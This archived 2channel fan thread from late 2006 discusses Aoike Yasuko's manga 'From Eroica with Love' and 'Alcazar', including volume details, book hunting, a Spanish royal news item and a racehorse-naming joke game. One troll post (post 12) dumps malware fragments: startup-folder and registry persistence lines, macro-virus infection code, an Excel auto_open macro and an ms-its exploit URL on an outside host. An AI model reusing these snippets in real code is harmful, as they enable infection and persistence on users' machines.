2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■青池保子総合■エロイカより愛をこめて・他[29]

1 :部下B:2006/12/24(日) 12:24:10 ID:???0
…なんだよ、硬い事いうなよA。休日出勤なんだから菓子食いながら
仕事したっていいだろ?つーか、いつものことじゃん。どーせ少佐もいないし。
お前の分はちゃんと残しておくからさあ。
あー、シュトレーンうめー。

あ?…うわ!しょ、少佐〜!!


つ【注意事項】
・sage推奨(メール欄にsage)
・再開後はコミックス20巻以降、文庫14巻以降
・個人サイトのURLは貼らない

☆前スレ☆
■青池保子総合■エロイカより愛をこめて他[28]
http://comic6.2ch.net/test/read.cgi/gcomic/1160899301/

過去ログ、関連スレは>>2>>4あたりまで


2 :部下B:2006/12/24(日) 12:25:38 ID:???0
∇過去ログはこちら

プロトタイプ エロイカより愛をこめて 2000.2.29〜
http://mentai.2ch.net/gcomic/kako/951/951836010.html
エロイカより愛をこめて 2000.6.8〜
http://piza.2ch.net/gcomic/kako/960/960400523.html
エロイカより愛をこめて第二作戦 2000.11.15〜
http://salad.2ch.net/gcomic/kako/974/974220363.html
エロイカより愛をこめてMission3rd 2001.4.30〜
http://salad.2ch.net/gcomic/kako/988/988607225.html
エロイカより愛をこめて 巻四 2001.7.7〜
http://salad.2ch.net/gcomic/kako/994/994513316.html
エロイカより愛をこめて 其の五 2001.8.20〜
http://comic.2ch.net/gcomic/kako/998/998248639.html
【青池保子総合スレ】エロイカより愛をこめて VOL.6 2001.11.4〜
http://comic.2ch.net/test/read.cgi/gcomic/1004871048/
↑過去ログ倉庫(2-956中略)
【青池保子総合】エロイカより〜 第7の封印 2002.3.26〜
http://comic.2ch.net/gcomic/kako/1017/10171/1017137201.html
【青池保子総合】エロイカより〜 8日目の安息 2002.9.15〜
http://comic.2ch.net/gcomic/kako/1032/10320/1032065531.html
【青池総合】“9”月の七日間【エロイカより〜】2002.12.12〜
http://comic.2ch.net/gcomic/kako/1039/10396/1039698030.html
【青池保子総合】エロイカより〜 コーヒーに角砂糖10個 2003.5.14〜
http://comic.2ch.net/test/read.cgi/gcomic/1052901784/
↑過去ログ倉庫(2-980中略)
■青池保子総合■エロイカより愛をこめて他(11)■ 2003.9.4〜
http://comic.2ch.net/test/read.cgi/gcomic/1062677772/


3 :部下B:2006/12/24(日) 12:27:54 ID:???0
∇過去ログはこちら
■青池保子総合■エロイカより愛をこめて他[12]■ 2004.1.1〜
http://comic4.2ch.net/test/read.cgi/gcomic/1072909229/
■青池保子総合■エロイカより愛をこめて他(13)■ 2004.5.19〜
http://comic6.2ch.net/test/read.cgi/gcomic/1084897561/
■青池保子総合■エロイカより愛をこめて他(14)■ 2004.8.23〜
http://comic6.2ch.net/test/read.cgi/gcomic/1093262811/
■青池保子総合■エロイカより愛をこめて他(15)■ 2004.11.10〜
http://comic6.2ch.net/test/read.cgi/gcomic/1100017537/
■青池保子総合■エロイカより愛をこめて他[16]■
http://comic6.2ch.net/test/read.cgi/gcomic/1106429050/l50
■青池保子総合■エロイカより愛をこめて他[17]■ 2005.4.17〜
http://comic6.2ch.net/test/read.cgi/gcomic/1109952386/l50
■青池保子総合■エロイカより愛をこめて他〔18〕■
http://comic6.2ch.net/test/read.cgi/gcomic/1113670331/
■青池保子総合■エロイカより愛をこめて他〔19〕2005.5.31〜
http://comic6.2ch.net/test/read.cgi/gcomic/1117542885/
■青池保子総合■エロイカより愛をこめて他〔20 2005.07.01〜
http://comic6.2ch.net/test/read.cgi/gcomic/1120213305/
■青池保子総合■エロイカより愛をこめて他〔21 2005.08.28〜
http://comic6.2ch.net/test/read.cgi/gcomic/1125159287/
■青池保子総合■エロイカより愛をこめて他[22] 2005.10.01〜
http://comic6.2ch.net/test/read.cgi/gcomic/1128176768/
■青池保子総合■エロイカより愛をこめて他[23]■2005.11.02〜
http://comic6.2ch.net/test/read.cgi/gcomic/1130933600/


4 :部下B:2006/12/24(日) 12:29:30 ID:???0
∇過去ログはこちら
■青池保子総合■エロイカより愛をこめて他[24] 2005.10.01〜
http://comic6.2ch.net/test/read.cgi/gcomic/1135494420/
■青池保子総合■エロイカより愛をこめて他[25]■2005.11.02〜
http://comic6.2ch.net/test/read.cgi/gcomic/1142275329/l50
■青池保子総合■エロイカより愛をこめて他[26]■2006.8.1〜
http://comic6.2ch.net/test/read.cgi/gcomic/1148813665/
■青池保子総合■エロイカより愛をこめて他[27}■2006.10.15〜
http://comic6.2ch.net/test/read.cgi/gcomic/1154411312/

∇関連スレはこちら

*姉妹スレ*

【懐かし漫画板】
アルカサル−王城−2城目
http://comic6.2ch.net/test/read.cgi/rcomic/1142075942/

2ちゃんねる少女漫画板「青池保子総合」スレッド過去ログ倉庫
ttp://matarine.sakura.ne.jp/comic/eroica.htm
に、スレ19まで保存されています。

過去スレ倉庫
http://gcomic2ch.hacca.jp/aoike/index.html
23まで保管されています。


5 :部下A:2006/12/24(日) 12:33:36 ID:???0
Bのやつは今、少佐にしぼられてる最中なんで不備な点があれば
ぼくの方へご指摘宜しくお願いします(きりっ)

6 :部下A:2006/12/24(日) 12:42:30 ID:???0
>>4の過去スレ倉庫は現在404になっております。
早々にすみません。


7 :花と名無しさん:2006/12/24(日) 12:56:05 ID:???0
Bさん休日出勤おつ〜。

34巻の番外編で、少佐がLAND ROVER に乗ってるけど、これってイギリスの
メーカーじゃなかったっけ?
レンタカーだとしても、国産車好きの少佐が、ずいぶん柔軟になったなあ。

8 :花と名無しさん:2006/12/24(日) 14:45:18 ID:???0
B君で来るとは予想外w
>1さんおつ〜。

>7
34巻見直したら、確かに英国車のローバーだった。
気が付かなかったよ…。
青池先生も細かいけど、ファンも目端が利いてると改めて思ったわ。

9 :花と名無しさん:2006/12/24(日) 15:08:36 ID:???0
B君、スレ立て乙華麗です。
シュトーレン、私も食べたいなぁ。
  o
      O______    。    。 °
       ゝ  \    o
    r ⌒ヽ(ニニニヽ。        o
   (    ( ^ω^)   o
    ヽ.。 (○ o ○ . o
 °     (__/ヽ__)

10 :花と名無しさん:2006/12/24(日) 15:10:34 ID:???O
>>1
B君、乙華麗。
休日出勤にやって来たのは、少佐に化けた伯爵ってことは…?
情報部がある建物のセキュリティーは、どんなだろうとふと思ってしまったよ。

11 :花と名無しさん:2006/12/24(日) 16:16:31 ID:???0
おお今回はB君が立ててくれたのか、意外だったけど乙。
A君もフォロー乙。

12 :<body onload=window()>:2006/12/24(日) 17:14:32 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

13 :花と名無しさん:2006/12/24(日) 17:39:20 ID:???O
>>1
B君乙!

14 :花と名無しさん:2006/12/24(日) 18:41:29 ID:???0
ハレルヤエクスプレス、みなさんメリークリスマス
天地創造は天井画、地には平和を!

15 :花と名無しさん:2006/12/24(日) 21:33:46 ID:???0
>>10
英ロンドン・ヒースロー空港は濃霧でマヒ状態、
ドイツ便も欠航してるらしいよ。今年はお家で大人しくクリスマスかもね伯爵

16 :花と名無しさん:2006/12/24(日) 22:33:32 ID:???0
>>1
B君なのに仕事してる……!
乙!


エロイカが読みたくて本屋に行ったんですが、ここ2週ほどかかって、計16店舗
の本屋と10店舗以上の大型古書店に行って、まだそれでも全部集まらない……orz

何で私の行くところには29巻が無いんだよー(T∀T)
29巻だけ手に入らないのでその続きが読めない……

17 :花と名無しさん:2006/12/24(日) 22:42:22 ID:???0
>>16
潔くネットで頼めばよかったのに・・・

18 :花と名無しさん:2006/12/24(日) 22:52:53 ID:???0
>>17
追い討ちかけてるね。

19 :花と名無しさん:2006/12/24(日) 23:44:34 ID:???0
>>16
きっと今夜サンタさんが…

アーメンハレルヤピーナッツバター

20 :花と名無しさん:2006/12/25(月) 00:08:50 ID:???0
>>16
「来年の楽しみに」という天からのお告げなのかも試練よ。

21 :花と名無しさん:2006/12/25(月) 02:27:30 ID:???0
34巻、二日目に伯爵に変装した部下某が
「妻に見られたら離婚だよぅ」と嘆いていたけど、
そんなことぐらいで?どんな奥さんだよ。と思ってしまった。
サングラスかけてるし、伯爵に変身ならいいじゃん。
ごろつき姿とか女装だったら分かるけど。

22 :花と名無しさん:2006/12/25(月) 02:30:21 ID:???0
部下たちは家族に諜報活動に携わってることをいってないんじゃない?
まさか女装というか変装するような仕事だなんて
奥さんは想像もしてなかったとしたら、けっこう引くと思うよw

23 :花と名無しさん:2006/12/25(月) 02:36:11 ID:???0
SISのサイト見てたら
「家族や恋人には自分がスパイ活動をしている事を知らせてもOK」
とあったので普通にばらしているような気がする。

24 :花と名無しさん:2006/12/25(月) 04:56:47 ID:???0
B君、細かいことを言うようだが
「シュトーレン」じゃなくて「シュトレン」だそうですよ。

日本にいるドイツ人菓子職人がそう言ってる本を持ってるもんで。

25 :花と名無しさん:2006/12/25(月) 05:01:52 ID:???0
だぶんあくびしながら言ったのさ

26 :花と名無しさん:2006/12/25(月) 06:35:56 ID:2Ww/nxaV0
新スレ乙・アピールage

「シュトーレン」と書いてある店が多いよね。
LとRの発音区別なんてしなくても、長短の区別くらいは
しておいていいんでは、といつも思う。

27 :花と名無しさん:2006/12/25(月) 09:38:33 ID:???0
>>16
大手書店だったら支店に在庫がないか調べてくれるよ。あったら取り寄せてくれる。
自分は待ちきれなくていける距離だったからキープ頼んで自分でそのまま取りに行った。

28 :花と名無しさん:2006/12/25(月) 10:38:34 ID:???0
27ならなぜか2冊あるから送ってあげたのに残念

29 :花と名無しさん:2006/12/25(月) 11:04:42 ID:???0
>>19,20、27,28
ありがとうございます(T∀T)情けが身にしみるー。

ここ数年全く漫画買ってなくて、まさか秋田の本があんなに書店で少ない
とは思ってもいませんでした。数年前はまだもちょっと品揃えが……
かなり何でも揃ってる、特に名作系の品揃えがいいお店でも、DVDなんか
で売り場を侵食されてるせいで本が前より減ってるみたいでした。
今後は調べたり、ネット利用でいかねばなーと反省しました。

けれどここ数日必死になってたのを哀れに思ったらしい友人が、今朝29巻を
ゲットしてくれたそうなのです!アルカサルも買ってくれたと!
これで正月にエロイカとアルカサル漬けが出来るー!
今晩家にケーキ食べがてら来てくれるそうなので、今から予定以上にもりもり
焼きます。少佐が嘆く量を作ろうと思います。

30 :花と名無しさん:2006/12/25(月) 11:06:56 ID:???0
Gくんは伯爵に変装する部下に誰を選んだのか気になる脳。
第一、第二候補あたりは別任務中で使えなかったようだが

31 :花と名無しさん:2006/12/25(月) 11:45:30 ID:???0
まさにサンタ到来だなww
おめでとうー>>29

32 :花と名無しさん:2006/12/25(月) 14:49:22 ID:???0
>>29
まさに「持つべきものは友」ですねえ。

33 :花と名無しさん:2006/12/25(月) 15:16:55 ID:???0
大変な苦労のようだったので報われて良かったね。
いい友達だ。
31巻の少佐のケーキを焼いてあげるといいww

ところで自分もアルカサル読みたくなってきた。
大分前に貸して、かえってこないんだよなあ。買いなおそうかな。

34 :花と名無しさん:2006/12/25(月) 17:00:15 ID:???0
完結編が終わったらまとめて文庫化と期待している自分

35 :花と名無しさん:2006/12/25(月) 17:16:59 ID:eHLeAlCuO
33
漏れもww

36 :花と名無しさん:2006/12/25(月) 21:00:45 ID:???0
>>30
クジ引きしか決めようがなかったそうだからGちゃんが選んだとは言い難い。
CかFかH〜Yだが範囲広すぎだw

37 :花と名無しさん:2006/12/25(月) 21:36:30 ID:???0
>>30
第一、第二候補はD君、E君とお見うけします
私はE君がいいなー。ベルリン組みでほんと残念だよ・・・

38 :花と名無しさん:2006/12/26(火) 00:37:07 ID:???0
>>23
みんな命がけなの? 人殺しが許されているわけじゃないよね。
たしか、仕事がら外国人と結婚したり
つきあったりしちゃいけないって聞いたことがあるような

39 :花と名無しさん:2006/12/26(火) 01:37:48 ID:???0
>>38
本物のスパイは人を殺さないってさ。殺人許可証なんて存在しないんだって。
ttp://www.zakzak.co.jp/gei/2006_11/g2006111623.html

40 :花と名無しさん:2006/12/26(火) 01:41:35 ID:???0
>>38
仕事の大半は「報告書を作成すること」
…まあそうだよなと思う。

ところで昨日読んだ小説、
最初は女性が主人公のドタバタコメディな恋愛小説かと思いきや
最後はMI6やらCIAエージェントが活躍するスパイ小説だったのでびっくりした。
発振器付きイヤリングとか、螺旋のこ付きサングラス、閃光弾が仕込まれたリップとかの
ロレンスが喜びそうなスパイ小道具がいっぱい出てきたw

41 :花と名無しさん:2006/12/26(火) 05:27:46 ID:???0
スペイン】「王子は毒殺でなく自然死」・・・スペイン王室600年の謎が解明[12/25]
http://news18.2ch.net/test/read.cgi/news5plus/1167065648/

カスティーリャ王国のサンチョ王子は、王位を狙う叔父に毒殺されたと600年以上に
わたって信じられてきたが、ミイラ化した遺体を調べた結果、王子は7歳で自然死
したことがわかった。

スペインの王家にまつわる有名な伝説が訂正されることになりそうだ。
医学検査の結果、「残酷王」ペドロ1世の息子で王位継承者だったサンチョ王子は、
1370年、肺の感染症で死亡したことがわかった。

叔父エンリケが王子を毒殺したと伝えられているが、王子の遺体からは、シアン化物、
ヒ素、水銀その他の毒は全く検出されなかった。

1409年以来、王子の遺体を預かっている修道院の修道女マリア・ヘスス・ガランさんは、
「王子は毒殺されたわけではないようです」と述べた。

この検査はグラナダ大学とバルセロナ総合病院の病理学ユニットによって行われた。

サンチョ王子は(何らかの火から出たものとみられる)煙を吸い込んで肺を痛めたらしい。

アルフォンソ11世の非摘出子エンリケは、1369年にカスティーリャの内戦で異母兄弟で
あるペドロ1世を殺して王位についた。
彼は「庶子王エンリケ」と呼ばれている。


ニュースソース
http://www.excite.co.jp/News/odd/00081167035179.html


42 :花と名無しさん:2006/12/26(火) 10:24:34 ID:???0
エンリケがサンチョを毒殺するシーンをすでに先生が描いていたりしなければよいが…

43 :花と名無しさん:2006/12/26(火) 11:16:09 ID:???0
まあ、描いてしまったあとなら
それはそれで仕方あるまい。あくまでフィクションなわけだし。

エンリケ的には「また私の姑息なふいんき(ryを強調しやがって」
になるだろうけど…w

44 :花と名無しさん:2006/12/26(火) 20:36:20 ID:???0
なんで煙を吸ったんだろう?城に火を放たれたとか?

45 :花と名無しさん:2006/12/26(火) 21:03:07 ID:???O
放火されて殺害された可能性はあるんじゃ…?

にしてもタイムリーなニュースでしたねww

46 :花と名無しさん:2006/12/27(水) 00:14:44 ID:???0
サンチョが死ぬのはドンちゃんの翌年なので
まだ描いてないだろうと思う。

47 :花と名無しさん:2006/12/27(水) 00:24:36 ID:???0
先生が完結に向かって作品を描いているこの時期にこのニュース。
運命的なものを感じます。ますます楽しみなアルカサル。

48 :花と名無しさん:2006/12/27(水) 06:41:54 ID:???0
すみません、「サド目」ってどういう意味ですか?
サド気味ってこと?もしくはサドっぽい目ということ?

49 :花と名無しさん:2006/12/27(水) 11:10:50 ID:???0
サドの目でつよ。

50 :花と名無しさん:2006/12/27(水) 16:29:10 ID:???0
エンリケ・ベラ

51 :花と名無しさん:2006/12/27(水) 21:47:54 ID:???0
>>48
三白眼のサドっぽい目、でいいと思う。
青池さんの漫画で言うと少佐とか艦医とか。

52 :花と名無しさん:2006/12/27(水) 22:14:11 ID:???O
安蘭さん(ティリアン役の人だよね)ガンガレ〜(^-^)ノ~~

53 :花と名無しさん:2006/12/27(水) 23:08:49 ID:???0
専ブラjaneなんだが、このスレのタイトルが

■青池保子総合■エロ...

に見えるww

54 :花と名無しさん:2006/12/27(水) 23:35:13 ID:???0
>>49 >>51 有難うございました。
三白眼は確かにサドっぽいですねw なんとなくわかりました。

55 :花と名無しさん:2006/12/28(木) 16:39:42 ID:???0
公式の日記更新。

エロイカ塗り絵が出版されるー!!!!!!!!!!!
すごーーーーーく楽しみ。

宝塚かぁ・・・・・行きたいけどあの雰囲気が恐いぽ

56 :花と名無しさん:2006/12/28(木) 16:43:36 ID:BxeCB/VqO
宝塚、ガセかもしれんが、さりげにヒールが主人公とか言う情報を落としてた人が居たのを思い出した…。
ヒールが主人公ならどうなるんだろう。
よく知らないんだけど。

57 :花と名無しさん:2006/12/28(木) 18:00:27 ID:???O
ヒール=悪役って意味?
だとしたら、悪役=ティリアンであってるよ。
「エル・アルコン」はティリアンが主役だし。

58 :花と名無しさん:2006/12/28(木) 18:01:26 ID:???0
夕方のTBSの全国ニュースでドイツ軍の派兵問題?で最後に
松明式典が映った。

TBS、遅ればせのクリスマスプレゼントありがとう。

59 :花と名無しさん:2006/12/28(木) 19:46:31 ID:???0
>>55
少佐を金髪に塗れる日がクル━━━━(゚∀゚)━━━━ッ!! 
Gちゃんの絵もあったら、心をこめて可愛く塗ってあげようw

M社ってどこでしょ。大人の塗り絵シリーズ出してるところでM始まりがわからんのです。
色鉛筆と抱き合わせ販売ではありませんように(-人-)ナムナム

60 :花と名無しさん:2006/12/28(木) 20:12:52 ID:???0
ベルばら塗り絵みたいに主線ヨレヨレじゃなきゃいいけど(-人-)ナムナム

61 :花と名無しさん:2006/12/28(木) 20:47:30 ID:???0
エロイカ塗り絵あったら…という話題、スレ27で出ていましたね
パチ&スロ台にはなりませんように ナムナム
馬名は個人的におk テツノクラウス とか レッドグローリア とかで

62 :花と名無しさん:2006/12/28(木) 22:40:56 ID:???0
おお、その発想は無かったよ>>61さん!!
入会している一口クラブで、馬名応募してみよう。

63 :花と名無しさん:2006/12/28(木) 22:49:05 ID:???0
>>61
テツノクラウスw
実現したら男性読者もいるから結構元ネタ気づくんじゃないwww

64 :花と名無しさん:2006/12/29(金) 00:42:49 ID:???0
負けたりしたら少佐が烈火のごとく怒り出しそうだwww

65 :花と名無しさん:2006/12/29(金) 03:44:27 ID:???0
ティリアンパープルという名の競走馬はいる。
(「いた」と言うべきか)

66 :花と名無しさん:2006/12/29(金) 06:55:13 ID:???O
>>65
それ、馬主さんと会ってみたいな……

馬につけたい名前ならヒースムナゲオーもいくない?

67 :花と名無しさん:2006/12/29(金) 07:43:51 ID:???0
偶然じゃないの?そもそもティリアンって紫の色名の一種だしさ。
勝手に勘違いして突撃したりしたらpgrされるぞ。

68 :花と名無しさん:2006/12/29(金) 08:52:28 ID:???0
ジェイムズコゼニオー
しまった10文字だ。

69 :花と名無しさん:2006/12/29(金) 09:18:45 ID:???O
>>68
ちょwww違和感ないw

70 :花と名無しさん:2006/12/29(金) 10:43:12 ID:???0
>>68
バロスwwww

10文字じゃダメなの?

71 :花と名無しさん:2006/12/29(金) 11:54:28 ID:???0
ブリザードローデ

私は今も走っている。こうしてな……!

72 :花と名無しさん:2006/12/29(金) 11:54:52 ID:???0
ぬり絵なんて幼稚園以来・・・少佐ぬりぬり
来年の秋って それまで中世の話しか青池先生は書かないのかな?
はやくエロイカにもどってきて〜


73 :花と名無しさん:2006/12/29(金) 12:20:24 ID:???0
>>71
大笑いしたwwwww!
みんないいセンスしてるなぁ。

「テツノクラウス」
「レッドグローリア」
「ヒースムナゲオー」
「ジェイムズコゼニオー」
「ブリザードローデ」

他に出走馬はいないか?

74 :花と名無しさん:2006/12/29(金) 13:14:19 ID:???0
ギンノオーロラ

ぐらいしか思いつかない。

75 :花と名無しさん:2006/12/29(金) 13:14:45 ID:???0
シノブニジンスキー

ヒース 早く私に乗って・・・

76 :花と名無しさん:2006/12/29(金) 13:25:39 ID:???O
スダレシツジ
スカシタオフランス

う〜ん、難しい…

77 :花と名無しさん:2006/12/29(金) 13:29:51 ID:???0
今週の注目レース、アオイケ記念w

78 :花と名無しさん:2006/12/29(金) 13:35:37 ID:???0
カクザトーブチョー

79 :花と名無しさん:2006/12/29(金) 13:36:52 ID:???0
クリスタカマゴジラ

80 :花と名無しさん:2006/12/29(金) 13:37:31 ID:???0
>>76
スダレコンラート

でどうだ?

81 :花と名無しさん:2006/12/29(金) 13:38:58 ID:???0
アイアムロレンス

82 :花と名無しさん:2006/12/29(金) 13:41:15 ID:???0
おまいら面白杉wwwww

83 :花と名無しさん:2006/12/29(金) 13:47:23 ID:???0
ワタシヲミテ

競馬育成ゲームをお年玉がわりに買おうかな

84 :花と名無しさん:2006/12/29(金) 13:48:30 ID:???0
ダーティーシリウス

85 :花と名無しさん:2006/12/29(金) 14:15:06 ID:???0
クラッカーキュー

86 :花と名無しさん:2006/12/29(金) 14:24:37 ID:???0
オトシアナキュー

87 :花と名無しさん:2006/12/29(金) 14:38:53 ID:???0
ケルトノゲンソー

マダムノモウソー

ウインノネワザシ


88 :花と名無しさん:2006/12/29(金) 14:53:28 ID:???0
ハゲノミーシャ

89 :花と名無しさん:2006/12/29(金) 15:05:02 ID:???0
・・ハンブルクテイオー

90 :花と名無しさん:2006/12/29(金) 15:06:37 ID:???0
ちょwwwワロス

91 :花と名無しさん:2006/12/29(金) 15:08:26 ID:???0
カーテントウカンカク

92 :花と名無しさん:2006/12/29(金) 15:14:24 ID:???0
エロイカダイオウ

93 :花と名無しさん:2006/12/29(金) 15:18:47 ID:???0
ルコックマイペース

クウキヨメルコック

94 :花と名無しさん:2006/12/29(金) 15:20:40 ID:???0
ジリータイツクン

95 :花と名無しさん:2006/12/29(金) 15:22:10 ID:???0
ワタシハプロダヨ

アーイッキュウヒンダ

96 :花と名無しさん:2006/12/29(金) 15:29:37 ID:???0
アラスカイキダー

97 :花と名無しさん:2006/12/29(金) 15:30:01 ID:???0
君たちは病気だ

98 :花と名無しさん:2006/12/29(金) 19:52:17 ID:???O
カーテントウカンカクがツボったw

99 :花と名無しさん:2006/12/29(金) 20:32:48 ID:???O
ベンリヤヒゲダルマ
パーティーロレンス
エスカラエルサイズ

100 :花と名無しさん:2006/12/29(金) 21:53:08 ID:nVAt/OJUO
かくて青池スレはネタスレとなった…

みんなバロスww

101 :花と名無しさん:2006/12/29(金) 22:03:18 ID:???0
ロレは競馬にいってそうだな。
お貴族様がいくようなやつ。

102 :花と名無しさん:2006/12/29(金) 22:07:07 ID:???0
>>89 ハンブルクテイオー 気に入ったw

103 :花と名無しさん:2006/12/29(金) 22:13:35 ID:???0
タイトルそのまま使えそう

ハレルヤエクスプレス
インシャーアッラー

とかね。

104 :花と名無しさん:2006/12/29(金) 22:24:46 ID:???0
9文字以内ですよ。

105 :花と名無しさん:2006/12/29(金) 22:28:30 ID:???0
オケショウホマレ

106 :花と名無しさん:2006/12/29(金) 22:30:56 ID:???0
ツェットペーペー

107 :花と名無しさん:2006/12/29(金) 22:35:33 ID:???0
ゴリオシディック

108 :花と名無しさん:2006/12/29(金) 22:40:36 ID:???0
ブラザーペケル

109 :花と名無しさん:2006/12/29(金) 22:54:46 ID:???O
>>77で思い出した。
モンティ・パイソンでエリザベス女王杯のシーンがあって
「エリザベス杯の幕があきました!一番にエリザベス女王続いてエリザベス女王追い上げるのはエリザベス女王とエリザベス女王!」と実況。
エリザベス女王(のそっくりさん)がスカートまくって走ってくるの。
ハンブルクテイオーが怒りながらいっぱい走ってきてほしいなぁ
へっへっへ……す・て・き☆(ジェイムズ君の真似)

110 :花と名無しさん:2006/12/29(金) 22:59:30 ID:???0
オオワライダヨー 

111 :花と名無しさん:2006/12/29(金) 23:12:25 ID:???0
ブカアーキリット
ブカベーグータラ


アラスカオクリ

112 :花と名無しさん:2006/12/30(土) 00:08:46 ID:???0
みんな馬になっちゃって・・・
騎手はいないのか?

113 :花と名無しさん:2006/12/30(土) 00:10:58 ID:???0
いや別にキャラを擬馬化してるわけじゃないからww

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)